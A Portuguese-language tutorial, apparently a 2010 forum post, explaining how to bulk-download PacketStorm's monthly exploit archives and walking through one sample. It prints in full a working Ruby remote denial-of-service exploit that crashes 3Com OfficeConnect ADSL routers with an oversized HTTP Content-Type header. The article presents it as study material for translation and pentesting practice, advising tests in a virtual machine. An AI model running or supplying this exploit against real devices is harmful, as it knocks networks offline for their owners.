Download Mensal/Anual dos exploits do PacketStorm http://www.packetstormsecurity.org

[firebits]

ps.jpg

Este site é um dos mais conhecidos pela comunidade de segurança. Inclusive é um dos objetivos que o site Segurança Linux, tem a alcançar. A tradução dos papers, exploits, vídeos e outros materiais. Em meados de 2009, o projeto Backtrack Brasil http://www.backtrack.com.br já estava traduzindo parte do conteúdo deste site, mas resolvemos ajudar e colaborar com esta ótima idéia que o SL.

Passo 1
Entre no site .:[ packet storm ]:. - http://packetstormsecurity.org/ com seu browser preferido.

Passo 2
Geralmente quando vamos procurar algum exploit ou outras informações, como quais são os exploits encontrados mais atualizados, clicamos aqui, neste menu "Exploits: By Month", em português, seria "Exploits: Por Mês" durante o ano atual. No caso deste artigo que escrevi, atualmente estamos 2010.


E mais, passe o mouse em cima do link do mês de Março 2010 (March 2010)



Veja que na parte inferior, do navegador exibe o Path (Caminho), provavelmente estão armazenados os exploits compactados em um único pacote TGZ.

Passo 3
Mas caso você precise de todos os exploits, sem ter que ler um por um e facilitar o processo de tradução e teste dos exploits, é bem simples:

Passo 4
Você clica na pasta que corresponde o Ano e Mês, dos exploits e depois no fim da URL, você adiciona "AnoMes.tgz", sem as aspas, veja na figura abaixo:

Se um tela de download aparecer, faça o download e você terá todos os códigos-fonte dos exploits que desejou.

Vamos ver um exemplo de exploit que fizemos download do mês de dezembro de 2009, que em inglês seria a Data curta em formato AAMM (ano e Mês)

O exploit 3com_ctdos.rb.txt é feito em Ruby, devido a presença do extensão *.rb antes do *.txt (provavelmente adicionaram a extensão *.txt para evitar problemas iniciais em alguns antivirus) e também o código-fonte (source code) constar comandos de Ruby e o proprío autor, citou ser no código-fonte (source-code) ser Ruby, veja em "Exploit languaje -> Ruby"

Explicando a idéia do exploit 3com_ctdos.rb.txt

Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
Seria o modelo do equipamento que o autor testou

Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
Versão do firmware que foi testado e qual foi a data do mesmo

Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
Quais os SO que foram testados

Exploit languaje -> Ruby
Linguagem de programação usada para a exploração (exploit)

Type -> Remote Denial of Service Exploit by HTTP
Tipo de Ataque, no caso DoS - Denial of Service (Negação de Serviço) via HTTP

Additional info:
The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
Informações Adicionais sobre este exploit

Discovered and written by Alberto Ortega
PenTBox
Quem foi o autor do exploit e como entrar em contato com ele.

Código-fonte(Source Code) do exploit "3com_ctdos.rb.txt"

###############
# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit by HTTP
#
# Additional info:
# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
#
###############
# Discovered and written by Alberto Ortega
# PenTBox
###############

require "socket"

host = ARGV[0]
buffer = "A"
send = ""

puts ""
if !host
puts " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
puts " Remote DoS Exploit by HTTP"
puts " ------ Usage ---------------------------------------"
puts " ruby 3com_dosexploit.rb host"
puts " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
else
begin
socket = TCPSocket.new(host, 80)
puts "- Exploiting ..."
# 8.times is enough to DoS
9.times do
buffer = "#{buffer}#{buffer}"
end
# Here are the HTTP packet, Content-Type value causes the DoS
send = "GET / HTTP/1.1\r\nContent-Type:#{buffer}\r\n"
socket.write(send)
puts "- Successfully! :)"
rescue
puts "Connection problem"
end
end
puts ""

OBS: Em alguns SO com antivirus, será detectado como vírus mesmo sendo arquivo de texto puro, *.txt, porque fazem scanning nos arquivos internamente. Bom, ai você ja tem sua coleção exploits, que são como "escorpiões" e "aranhas" para estudarmos, tome cuidado em aos usá-los e NÂO-TESTAR EM SEU PRÓPRIO COMPUTADOR, POIS VOCÊ PODER TER PROBLEMAS. Monte uma maquina virtual em VirtualBox, VMware ou QEMU, e faça testes antes.

Não esqueça de passar no site do Backtrack Brasil também, em http://www.backtrack.com.br

Good Pentesting!

Artigo Próprio por firebits
http://www.backtrack-linux.org/forum.../firebits.html